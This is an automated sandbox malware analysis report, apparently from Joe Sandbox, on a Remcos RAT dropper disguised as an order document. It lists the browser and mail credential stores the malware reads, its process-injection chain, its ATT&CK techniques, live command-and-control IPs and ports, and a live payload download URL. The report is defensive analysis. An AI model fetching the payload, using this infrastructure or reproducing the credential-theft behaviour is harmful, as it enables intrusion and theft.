              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_235F2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_235F2264
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,11_2_004082CD
              Source: C:\Users\user\Desktop\order CF08093-24.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C

              Stealing of Sensitive Information

Source: Yara match | File source: 00000006.00000003.3278532416.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.3298978061.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.3298626109.0000000007B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4486408121.000000002340F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4475133406.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.3275406324.0000000007B2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004033F0 ESMTPPassword
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00402DB3 _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00402DB3 _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 2072, type: MEMORYSTR

              Remote Access Functionality

Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-HSAM04
Source: Yara match | File source: 00000006.00000003.3278532416.0000000007B2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.3298978061.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.3298626109.0000000007B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4486408121.000000002340F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4475133406.0000000007B39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4475133406.0000000007B15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.3275406324.0000000007B2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
MITRE ATT&CK Matrix (reconstructed from the flattened table; only techniques with matched signatures are listed, with the count shown in the report; the matrix's unmatched placeholder cells are omitted)

Tactics: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact

Reconnaissance: no matched techniques
Resource Development: no matched techniques
Initial Access: no matched techniques
Execution: 1 Windows Management Instrumentation; 11 Native API; 12 Command and Scripting Interpreter; 2 PowerShell
Persistence: 1 DLL Side-Loading
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 412 Process Injection
Defense Evasion: 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 11 Input Capture; 1 Credentials in Registry
Discovery: 1 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 27 System Information Discovery; 141 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 4 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: no matched techniques
Collection: 1 Archive Collected Data; 1 Data from Local System; 11 Input Capture; 2 Clipboard Data
Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 1 Non-Standard Port; 1 Remote Access Software; 2 Non-Application Layer Protocol; 112 Application Layer Protocol
Exfiltration: no matched techniques
Impact: 1 System Shutdown/Reboot
Behavior Graph (flattened graph rendered as a process tree) - ID: 1572358, Sample: order CF08093-24.exe, Start date: 10/12/2024, Architecture: WINDOWS, Score: 100
Start node: DNS/IP geoplugin.net; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 13 other signatures
• order CF08093-24.exe (started)
  - dropped: C:\Users\user\AppData\...\Servicerende.Gal55 (Unicode)
  - signature: Suspicious powershell command line found
  • powershell.exe (started)
    - dropped: C:\Users\user\...\order CF08093-24.exe (PE32); C:\...\order CF08093-24.exe:Zone.Identifier (ASCII)
    - signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 3 other signatures
    • msiexec.exe (started)
      - network: 212.162.149.91 (ports 2404, 49933, 49939; UNREAL-SERVERSUS, Netherlands); 212.162.149.89 (ports 49922, 80; UNREAL-SERVERSUS, Netherlands); geoplugin.net 178.237.33.50 (ports 49940, 80; ATOM86-ASATOM86NL, Netherlands)
      - dropped: C:\ProgramData\remcos\logs.dat (data)
      - signatures: Detected Remcos RAT; Tries to steal Mail credentials (via file registry); Maps a DLL or memory area into another process; Installs a global keyboard hook
      • msiexec.exe (started); signature: Tries to harvest and steal browser information (history, passwords, etc)
      • msiexec.exe (started)
      • msiexec.exe (started)
      • 3 other processes
    • conhost.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection

Initial sample:
Source | Detection | Scanner | Label | Link
order CF08093-24.exe | 13% | ReversingLabs | |
order CF08093-24.exe | 100% | Joe Sandbox ML | |

Dropped files:
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Lynlaases\Sikkerhedsuddannelsernes\order CF08093-24.exe | 13% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

URLs:
Source | Detection | Scanner | Label | Link
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe |
http://212.162.149.89/xONeIbG151.bintA | 0% | Avira URL Cloud | safe |
http://crl.micro?U | 0% | Avira URL Cloud | safe |
http://212.162.149.89/xONeIbG151.bin005 | 0% | Avira URL Cloud | safe |
http://crl.microzE | 0% | Avira URL Cloud | safe |
http://212.162.149.89/xONeIbG151.binA | 0% | Avira URL Cloud | safe |
https://login.live.cD | 0% | Avira URL Cloud | safe |
http://www.microsoft.cNU | 0% | Avira URL Cloud | safe |
http://www.imvu.comr | 0% | Avira URL Cloud | safe |
http://212.162.149.89/xONeIbG151.bin | 100% | Avira URL Cloud | malware |
http://www.ebuddy.com | 0% | Avira URL Cloud | safe |
Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | high

Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | | high
http://212.162.149.89/xONeIbG151.bin | false | Avira URL Cloud: malware | unknown

URLs from memory and binaries:
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.micro?U | powershell.exe, 00000002.00000002.3115887918.00000000071C9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.imvu.comr | msiexec.exe, 00000006.00000002.4486546941.00000000235C0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://login.li | msiexec.exe, 0000000A.00000002.3297767350.000000000293C000.00000004.00000010.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.imvu.com | msiexec.exe, msiexec.exe, 0000000C.00000003.3283992690.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284013613.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284037369.000000000327E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284599032.000000000327E000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gp?l | msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.microsoft. | powershell.exe, 00000002.00000002.3121960782.00000000083C8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.nirsoft.net | msiexec.exe, 0000000A.00000002.3297790419.000000000296F000.00000004.00000010.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | order CF08093-24.exe, order CF08093-24.exe.2.dr | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | msiexec.exe, 00000006.00000002.4486546941.00000000235C0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://212.162.149.89/xONeIbG151.bintA | msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | msiexec.exe, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://crl.micro | powershell.exe, 00000002.00000002.3110396387.0000000002D08000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://212.162.149.89/xONeIbG151.binA | msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.3110901476.0000000004B31000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://login.live.cD | msiexec.exe, 0000000A.00000002.3298377194.0000000002EBA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.3110901476.0000000004C86000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.3114311818.0000000005B99000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.cNU | powershell.exe, 00000002.00000002.3121960782.00000000083ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com/accounts/servicelogin | msiexec.exe | false | | high
https://login.yahoo.com/config/login | msiexec.exe | false | | high
http://geoplugin.net/json.gpdK | msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://212.162.149.89/xONeIbG151.bin005 | msiexec.exe, 00000006.00000002.4475133406.0000000007ABA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net/ | msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | | high
http://www.imvu.comata | msiexec.exe, 0000000C.00000003.3283992690.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284013613.000000000327D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.3284037369.000000000327E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.3284599032.000000000327E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.microzE | powershell.exe, 00000002.00000002.3121960782.00000000083ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.3110901476.0000000004B31000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gphymK | msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://geoplugin.net/json.gpIK | msiexec.exe, 00000006.00000002.4475133406.0000000007AFD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.ebuddy.com | msiexec.exe, msiexec.exe, 0000000C.00000002.3284176232.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
212.162.149.91 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | true
212.162.149.89 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1572358
                                                                          Start date and time:2024-12-10 13:50:06 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 9m 30s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:13
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:order CF08093-24.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@18/17@1/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 83.3%
                                                                          HCA Information:
                                                                          • Successful, ratio: 97%
                                                                          • Number of executed functions: 176
                                                                          • Number of non-executed functions: 295
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                           • Override analysis time to 240000 for currently running targets with high CPU consumption
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target powershell.exe, PID 4956 because it is empty
                                                                           • Not all processes were analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: order CF08093-24.exe
                                                                           • Time: 07:50:56, Type: API Interceptor, Description: 36x Sleep call for process: powershell.exe modified
                                                                           • Time: 07:53:28, Type: API Interceptor, Description: 2226518x Sleep call for process: msiexec.exe modified
                                                                           Match:212.162.149.89
                                                                           • Associated Sample Name / URL: PO. A-72 9234567.exe, Detection: malicious, Threat Name: FormBook, GuLoader, Context: 212.162.149.89/KSMZNlmay152.bin
                                                                           Match:178.237.33.50
                                                                           • Associated Sample Name / URL: matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta, Detection: malicious, Threat Name: Cobalt Strike, Remcos, HTMLPhisher, Context: geoplugin.net/json.gp
                                                                           • Associated Sample Name / URL: WgGo0xd2p8.exe, Detection: malicious, Threat Name: Remcos, Context: geoplugin.net/json.gp
                                                                           • Associated Sample Name / URL: 173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exe, Detection: malicious, Threat Name: Remcos, Context: geoplugin.net/json.gp
                                                                           • Associated Sample Name / URL: 1733782507080baec6756496aa00a9de94bd4b6146711872f8ab63e40379ca627825be54c2492.dat-decoded.exe, Detection: malicious, Threat Name: Remcos, Context: geoplugin.net/json.gp
                                                                           • Associated Sample Name / URL: 4wECQoBvYC.exe, Detection: malicious, Threat Name: Remcos, Context: geoplugin.net/json.gp
                                                                           • Associated Sample Name / URL: Aktarma,pdf.vbs, Detection: malicious, Threat Name: Remcos, Context: geoplugin.net/json.gp
                                                                           • Associated Sample Name / URL: Ref#60031796.exe, Detection: malicious, Threat Name: Remcos, Context: geoplugin.net/json.gp
                                                                           • Associated Sample Name / URL: PEbZthAqV9.exe, Detection: malicious, Threat Name: Remcos, PureLog Stealer, Context: geoplugin.net/json.gp
                                                                           • Associated Sample Name / URL: IB9876789000.bat.exe, Detection: malicious, Threat Name: Remcos, Context: geoplugin.net/json.gp
                                                                           • Associated Sample Name / URL: 1733479274764e7b4f05da07e19f78d3cf31f2aafa2f5d7a78af2fd18749e25dbbc1473b66785.dat-decoded.exe, Detection: malicious, Threat Name: Remcos, Context: geoplugin.net/json.gp
                                                                           Match:geoplugin.net
                                                                           • Associated Sample Name / URL: matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta, Detection: malicious, Threat Name: Cobalt Strike, Remcos, HTMLPhisher, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: WgGo0xd2p8.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
                                                                           • Associated Sample Name / URL: 173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exe, Detection: malicious, Threat Name: Remcos, Context: 178.237.33.50
